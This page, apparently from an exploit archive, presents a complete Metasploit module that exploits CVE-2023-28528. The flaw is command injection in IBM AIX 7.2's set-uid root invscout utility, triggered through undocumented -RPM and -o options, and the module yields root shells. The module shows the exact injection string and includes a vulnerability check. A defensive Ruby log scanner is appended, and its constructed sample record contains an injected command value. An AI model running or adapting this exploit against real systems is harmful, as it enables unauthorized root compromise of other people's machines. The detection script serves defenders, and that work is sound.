
IBM AIX 7.2 invscout Privilege Escalation Exploit

19 May 2023 | Reported by Brendan Coles | Type: zdt | Source: 0day.today

IBM AIX 7.2 invscout RPM Privilege Escalation Exploit. A command injection vulnerability in the set-uid root invscout utility yields root privileges.

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'invscout RPM Privilege Escalation',
        'Description' => %q{
          This module exploits a command injection vulnerability in IBM AIX
          invscout set-uid root utility present in AIX 7.2 and earlier.

          The undocumented -rpm argument can be used to install an RPM file;
          and the undocumented -o argument passes arguments to the rpm utility
          without validation, leading to command injection with effective-uid
          root privileges.

          This module has been tested successfully on AIX 7.2.
        },
        'Author' => [
          'Tim Brown', # Discovery and PoC
          'bcoles' # Metasploit
        ],
        'References' => [
          ['CVE', '2023-28528'],
          ['URL', 'https://talosintelligence.com/vulnerability_reports/TALOS-2023-1691'],
        ],
        'Platform' => %w[unix aix],
        'Arch' => ARCH_CMD,
        'Payload' => {
          'BadChars' => "\x00\x0a\x0d\x22",
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic telnet openssl'
          }
        },
        'DefaultOptions' => {
          'PrependSetresuid' => true,
          'PrependSetresgid' => true,
          'PrependFork' => true
        },
        'SessionTypes' => %w[shell meterpreter],
        'Targets' => [['Automatic', {}]],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2023-04-24',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptString.new('INVSCOUT_PATH', [true, 'Path to invscout executable', '/usr/sbin/invscout'])
    ])
  end

  def invscout_path
    datastore['INVSCOUT_PATH']
  end

  def check
    return CheckCode::Safe("#{invscout_path} is not executable") unless executable?(invscout_path)

    res = execute_command('id')
    id = res.to_s.scan(/^(.*?uid=.*?)$/).flatten.first.to_s

    return CheckCode::Safe("#{invscout_path} is not vulnerable.") unless id.include?('euid=0')

    CheckCode::Vulnerable("Output: #{id}")
  end

  def execute_command(cmd, _opts = {})
    rpm_path = "#{Rex::Text.rand_text_alphanumeric(8..12)}.rpm"
    rpm_args = "; #{cmd}; echo "
    res = cmd_exec("#{invscout_path} -RPM #{rpm_path} -o \"#{rpm_args}\"")
    vprint_line(res) unless res.blank?
    res
  end

  def exploit
    execute_command(payload.encoded)
  end
end
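
For detection, the module's notes list IOC_IN_LOGS: the injected command travels in the value passed to -o. The following added example (not part of the module or the original page) flags such invocations in process-execution records. The log line format and the function names are assumptions, and the sample records are constructed.

```ruby
require 'shellwords'

# Characters that let an option value break out into a shell command.
SHELL_META = /[;|&`<>\n]|\$\(/

# Classify one command line: :injection, :undocumented_option or nil.
def classify_invscout(cmdline)
  argv = begin
    Shellwords.split(cmdline)
  rescue ArgumentError
    cmdline.split # unbalanced quotes: fall back to whitespace split
  end
  return nil unless argv.first && File.basename(argv.first) == 'invscout'

  opts = argv.drop(1)
  # Value following each -o option (matched case-insensitively, since the
  # page shows both -rpm and -RPM).
  o_values = opts.each_cons(2).select { |flag, _| flag.casecmp?('-o') }.map(&:last)
  return :injection if o_values.any? { |v| v.match?(SHELL_META) }
  return :undocumented_option if opts.any? { |a| a.casecmp?('-rpm') || a.casecmp?('-o') }

  nil
end

# Scan log lines of the assumed form "<timestamp> uid=<n> cmd=<command line>".
def scan(lines)
  hits = lines.map do |line|
    m = line.match(/\A(\S+) uid=(\d+) cmd=(.*)\z/) or next
    verdict = classify_invscout(m[3])
    { time: m[1], uid: m[2].to_i, verdict: verdict } if verdict
  end
  hits.compact
end

# Constructed sample records (not real AIX audit output).
SAMPLE_LOG = [
  '2023-05-19T10:01:00 uid=0 cmd=/usr/sbin/invscout',
  '2023-05-19T10:02:11 uid=204 cmd=/usr/sbin/invscout -RPM aB3dE9xQ.rpm -o "; id; echo "',
  '2023-05-19T10:03:40 uid=204 cmd=/usr/sbin/invscout -rpm pkg.rpm -o "--test"',
  '2023-05-19T10:04:02 uid=204 cmd=/usr/bin/ls -o /tmp'
].freeze

scan(SAMPLE_LOG).each { |hit| puts hit } if __FILE__ == $PROGRAM_NAME
```

Because the description calls both options undocumented, any use of them by a non-root user is worth a lower-severity alert even when the -o value contains no shell metacharacters.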

Vulners AI Score: 7.4 (High risk)
CVSS 3.1: 7.8 - 8.4
EPSS: 0.01709